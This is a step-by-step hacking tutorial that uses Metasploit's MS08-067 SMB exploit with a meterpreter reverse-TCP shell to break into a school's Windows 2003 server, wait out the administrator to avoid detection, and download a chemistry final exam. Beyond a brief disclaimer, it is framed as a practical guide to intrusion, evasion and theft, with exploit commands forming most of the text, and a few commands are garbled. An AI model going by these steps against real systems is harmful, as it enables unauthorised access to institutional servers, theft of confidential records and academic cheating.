This hack uses Metasploit along with its meterpreter, so let's get after those finals and fire up our Metasploit in BackTrack!

Disclaimer:

        This is for demonstration/entertainment purposes only. Please do not break into your school's server and steal exams as it's illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.

1. Find the proper exploit:

        One of my favorite exploits is the RPC buffer overflow, since it works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.

        In our case here, our school is running a Windows 2003 Server that stores all the department's exams and records. So, let's use the /exploit/windows/smb/ms08_067_netapi. To find it, type:

        msf > search ms08

        Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:

        msf > use /exploit/windows/smb/ms08_067_netapi

2. Set the payload:

        Now we need to set our payload. In this case, we'll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp.

        msf > set payload /windows/meterpreter/reverse_tcp

        Let's take a look next at the options that we need for this exploit/payload combination by typing:

        msf > show options

3. Set the options:

        Now we can see that we need to set the RHOST and the LHOST.

        msf > set LHOST 192.168.1.114

        msf > set RHOST 192.168.1.108

4. Exploit the server:

        Now all we to need do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.

        msf > exploit

5. Check to see if the admin Is using the system:

        We should now have a meterpreter shell on the school's server. Before we can even consider to download files from that server, we want to make certain that no one is on that system where we might get detected. We can run the idletime command to see whether anyone has used the system recently.

        meterpreter > idletime

        As you can see, the last time someone did something on the system was just over 3 minutes ago. To be safe, let's wait a bit and hope the administrator goes home for night. The last thing we want is for the administrator to detect our attempt to download those final exams!

        Once we're safe and the system has been idle for awhile, our next step is to find those exams. Meterpreter uses standard Linux commands like ls, cd, pwd, and others, so let's type lpwd (both pwd and lpwd will work).

        Meterpreter responds with the / symbol indicating that we're in the root directory.

6. Find the final exams:

        We can then type ls to get a listing of all the directories and files in the root directory. Look for a directory with your school's name. That's probably where the exams are! Let's change directories to that folder:

        meterpreter c:\\YourSchool

        *Note: we need to use a double \\ to navigate to this directory.

        Now we're in YourSchool, we can get a directory listing by typing:

        meterpreter > ls

        We can see we have folders for Physics, Biology, Chemistry, and Pre-Calc. Since we're looking for the Chemistry final, let's navigate to the Chemistry directory.

        meterpreter > cd chemistry

        Voilà! There's the final exam for our chemistry class.

7. Download the Final:

        Meterpreter has a built-in download feature, so all we need to do is type:

        meterpreter > download C:\\chemistry\exams\FinalExam

        We can see that Metasploit has downloaded the final exam to our computer! Please note again that we do need to use the double backslash (\\) in denoting the directory of the file we want to download.

        When we navigate back to our BackTrack system, we can see that the chemistry final is in our root directory.